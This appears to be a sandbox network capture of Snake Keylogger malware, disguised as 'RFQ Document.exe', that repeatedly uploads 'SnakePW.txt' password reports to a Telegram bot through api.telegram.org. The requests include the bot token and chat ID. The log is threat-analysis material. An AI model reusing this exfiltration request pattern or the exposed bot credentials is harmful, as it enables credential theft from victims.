                                            Data Ascii: --------------------------8d98255f3c3aea9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:44 UTC438INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:44 UTC439INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12864,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808784,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            276192.168.2.450113149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:44 UTC439OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f3db8728
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:44 UTC439OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 64 62 38 37 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f3db8728Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:44 UTC440INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:44 UTC440INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12865,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808784,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            277192.168.2.450114149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:44 UTC441OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f3f8239e
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:44 UTC441OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 66 38 32 33 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f3f8239eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:44 UTC441INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:44 UTC442INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12866,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808784,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            278192.168.2.450115149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:45 UTC442OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f41721ba
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:45 UTC443OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 31 37 32 31 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f41721baContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:45 UTC443INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:45 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:45 UTC443INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12867,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            279192.168.2.450116149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:45 UTC444OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f42efb39
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:45 UTC444OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 32 65 66 62 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f42efb39Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:45 UTC445INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:45 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:45 UTC445INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12868,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            28192.168.2.449802149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:26 UTC44OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c53eb995
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:26 UTC44OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 33 65 62 39 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c53eb995Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:26 UTC45INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:26 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:26 UTC45INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12608,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808706,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            280192.168.2.450117149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:45 UTC446OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f4446dae
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:45 UTC446OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 34 34 36 64 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f4446daeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:45 UTC446INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:45 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:45 UTC447INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12869,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            281192.168.2.450118149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:45 UTC447OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f4636ccf
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:45 UTC447OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 36 33 36 63 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f4636ccfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:45 UTC448INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:45 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
